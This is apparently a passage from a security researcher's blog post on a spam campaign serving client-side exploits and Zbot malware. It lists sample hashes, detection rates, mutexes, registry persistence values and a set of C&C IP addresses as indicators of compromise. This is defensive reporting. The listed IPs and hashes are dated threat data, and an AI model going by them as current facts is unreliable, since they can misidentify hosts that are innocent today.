MD5: a19f1d5c98c2d7f036f2693ad6c14626
MD5: 3f02f35bc73ad9ef14ab4f960926fd45

Sample detection rate for the client-side exploits serving malicious script:
MD5: 00f5d150ff1b50c0bbc1d038eb676c29 - detected by 2 out of 48 antivirus scanners as Script.Exploit.Kit.C; Troj/ObfJS-EO

Sample detection rate for the served exploit:
MD5: d49275523cae83a5e7639bb22604dd86 - detected by 5 out of 48 antivirus scanners as HEUR:Exploit.Java.Generic; HEUR_JAVA.EXEC; TROJ_GEN.F47V0927

Upon successful client-side exploitation the campaign drops the following malicious sample on the affected hosts:
MD5: 6ef9476e6227ef631b231b66d7a2a08b - detected by 7 out of 48 antivirus scanners as Win32/Spy.Zbot.AAU; Trojan-Spy.Win32.Zbot.qckm; TROJ_GEN.F47V0927

Once executed, the sample starts listening on ports 3185 and 7101.

It also creates the following Mutexes on the system:
Local\{B0B9FAFD-CA9C-4B54-DBC9-BE58FA349D4A}
Local\{B0B9FAFC-CA9D-4B54-DBC9-BE58FA349D4A}
Local\{D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A}
Local\{D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A}
Local\{0BB5ADEF-9D8E-F058-DBC9-BE58FA349D4A}
Local\{911F9FCD-AFAC-6AF2-DBC9-BE58FA349D4A}
Global\{2E06BA86-8AE7-D5EB-DBC9-BE58FA349D4A}
Global\{B0B9FAFD-CA9C-4B54-DBC9-BE58FA349D4A}
Global\{B0B9FAFC-CA9D-4B54-DBC9-BE58FA349D4A}
Global\{D15F4CEE-7C8F-2AB2-DBC9-BE58FA349D4A}
Global\{D15F4CE9-7C88-2AB2-DBC9-BE58FA349D4A}
Global\{0BB5ADEF-9D8E-F058-DBC9-BE58FA349D4A}
Global\{BB67AFC4-9FA5-408A-DBC9-BE58FA349D4A}
Global\{3DC7903B-A05A-C62A-11EB-B06D3016937F}
Global\{3DC7903B-A05A-C62A-75EA-B06D5417937F}
Global\{3DC7903B-A05A-C62A-4DE9-B06D6C14937F}
Global\{3DC7903B-A05A-C62A-65E9-B06D4414937F}
Global\{3DC7903B-A05A-C62A-89E9-B06DA814937F}
Global\{3DC7903B-A05A-C62A-BDE9-B06D9C14937F}
Global\{3DC7903B-A05A-C62A-51E8-B06D7015937F}
Global\{3DC7903B-A05A-C62A-81E8-B06DA015937F}
Global\{3DC7903B-A05A-C62A-FDE8-B06DDC15937F}
Global\{3DC7903B-A05A-C62A-0DEF-B06D2C12937F}
Global\{3DC7903B-A05A-C62A-5DEF-B06D7C12937F}
Global\{3DC7903B-A05A-C62A-95EE-B06DB413937F}
Global\{3DC7903B-A05A-C62A-F1EE-B06DD013937F}
Global\{3DC7903B-A05A-C62A-89EB-B06DA816937F}
Global\{3DC7903B-A05A-C62A-F9EF-B06DD812937F}
Global\{3DC7903B-A05A-C62A-E5EF-B06DC412937F}
Global\{3DC7903B-A05A-C62A-0DEE-B06D2C13937F}
Global\{3DC7903B-A05A-C62A-09ED-B06D2810937F}
Global\{3DC7903B-A05A-C62A-51EF-B06D7012937F}
Global\{3DC7903B-A05A-C62A-35EC-B06D1411937F}
Global\{3DC7903B-A05A-C62A-55EF-B06D7412937F}
Global\{DDB39BDC-ABBD-265E-DBC9-BE58FA349D4A}
Global\{2E1C200D-106C-D5F1-DBC9-BE58FA349D4A}
MPSWabDataAccessMutex
MPSWABOlkStoreNotifyMutex

The following Registry Keys:
HKEY_CURRENT_USER\Software\Microsoft\Waosumag

And changes the following Registry Values:
[HKEY_CURRENT_USER\Identities] -> Identity Login = 0x00098053
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] -> Keby = ""%AppData%\Ortuet\keby.exe""
[HKEY_CURRENT_USER\Software\Microsoft\Waosumag] -> 2df3e6ig = 23 CD 87 C3 1E D1 FA C6 28 2E DF 4D 12 21; 2icbbj3a = 0xC3E6CD13; 185cafc2 = CB D5 E6 C3 F6 D8 CD C6 05 2E EF 4D

It then phones back to the following C&C (command and control) servers:
99.157.164.179
174.76.94.24
99.60.68.114
217.35.75.232
184.145.205.63
99.60.111.51
207.47.212.146
108.240.232.212
107.193.222.108
173.202.183.58
201.170.83.92
81.136.188.57
71.186.174.184

We've already seen the same IPs (217.35.75.232; 108.240.232.212) in the following previously profiled malicious campaign - Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware.

We've also seen (107.193.222.108) in the following malicious campaign - Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware, indicating that all of these campaigns are controlled using the same malicious botnet infrastructure.

The following malicious MD5s are also known to have phoned back to the same C&C servers used in this campaign, over the past 24 hours:
MD5: 9f550edbb505e22b0203e766bd1b9982
MD5: 46cdaead83d9e3de803125e45ca88894
MD5: ffe07e0997d8ec82feb81bac53838d6d
MD5: 28c0bc772aec891a08b06a4029230626
MD5: c8055c6668d1c4c9cb9d68c2c09c14d4
MD5: 0bbabb722e1327cbe903ab477716ae2e
MD5: c4c5db70e7c971e3e556eb9d65f87c84
MD5: 0ff4d450ce9b1eaaef5ed9a5a1fa392d
MD5: e01f435a8c5ed93f6800971505a2cdd2
MD5: 042508083351b79f01a4d7b7e8e35826
MD5: 1f5f75ae82d6aa7099315bf19d0ae4e0
MD5: 35c4d4c2031157645bb3a1e4e709edeb
MD5: a0065f7649db9a885acd34301ae863b0
MD5: 5503573f4fe15b211956f67c66e18d02
MD5: 01d757b672673df8032abbaa8acf3e22
MD5: fd99250ecb845a455499db8df1780807
MD5: 1fab971283479b017dfb79857ecd343b
MD5: a130cddd61dad9188b9b89451a58af28
MD5: 2af94e79f9b9ee26032ca863a86843be
MD5: 8b03a5cf4f149ac7696d108bff586cc5
MD5: 802a522405076d7f8b944b781e4fe133
MD5: b9c7d2466a689365ebb8f6f607cd3368
MD5: 43b78852a7363d8a4cf7538d4e68c887
MD5: c62b6206e9eefe75ba1804788dc552f7
MD5: 385b5358f6a1f15706b536a9dc5b1590
MD5: e3aae430ed4036b19f26fa2ed9bbe2bf
MD5: e782619301a0a0a843cedc5d02c563b5
MD5: fc16335d0e1827b271b031309634dc0f
MD5: 4850969b7febc82c8b82296fa129e818
MD5: 203e0acced8a76560312b452d70ff1e7
MD5: a55e21b0231d0508cb638892b6ee8ec5
MD5: edb1a26ebb8ab5df780b643ad1f0d50f
MD5: 053c84c12900b81506eb884ec9f930c9
MD5: e03d0dd786b038c570dc53690db0673b
MD5: 47d4804fda31b6f88b0d33b86fc681ae
MD5: 086b16af34857cb5dfb0163cc1c92569

Updates will be posted as soon as new developments take place. Continue reading →